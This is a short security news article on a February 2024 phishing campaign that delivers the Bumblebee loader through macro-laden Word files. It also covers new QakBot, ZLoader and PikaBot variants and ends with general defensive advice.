The Bumblebee malware, known for its role as a loader and initial access broker, has reappeared in a new phishing campaign targeting U.S. businesses. The campaign, observed in February 2024, utilizes voicemail-themed lures containing links to OneDrive URLs.
According to enterprise security firm, the URLs lead to Word files that spoof the consumer electronics company Humane. These files leverage VBA macros to execute a PowerShell command, which downloads and runs another PowerShell script from a remote server to install the Bumblebee loader.
First detected in March 2022, Bumblebee is used to download and execute follow-on payloads, such as ransomware. It has been associated with crimeware threat actors known for distributing BazaLoader (aka BazarLoader) and IcedID.
Bumblebee is believed to be developed by threat actors linked to the Conti and TrickBot cybercrime syndicate as a replacement for BazarLoader. In a previous campaign disclosed in September 2023, the malware was distributed using Web Distributed Authoring and Versioning (WebDAV) servers.
The recent attack chain stands out for its use of macro-enabled documents, especially considering Microsoft’s default blocking of macros in Office files downloaded from the internet starting July 2022. This marks a shift from previous campaigns that relied on different methods to install the loader, such as zipped LNK files or HTML attachments exploiting WinRAR flaws.
The resurgence of Bumblebee coincides with new variants of QakBot, ZLoader, and PikaBot. QakBot, distributed in the form of Microsoft Software Installer (MSI) files, has introduced improvements in encryption and the ability to detect virtual environments, making analysis more challenging.
Despite efforts to dismantle QakBot’s infrastructure in late August 2023, new variants have emerged, suggesting that threat actors with access to the original source code are experimenting with new builds. QakBot has also become the second most prevalent malware as of January 2024, highlighting its continued threat.
In a separate development, phishing sites mimicking financial institutions have been used to trick users into downloading remote desktop software, allowing threat actors to gain control of their machines. This underscores the evolving tactics used by cybercriminals to target businesses and individuals.
Enhance your defenses against the Bumblebee malware by educating your employees about phishing attacks and encouraging them to report suspicious emails. Utilize endpoint protection and threat intelligence tools to detect and respond to malware threats effectively. Organizations also should conduct regular security assessments and audits to identify and mitigate potential vulnerabilities.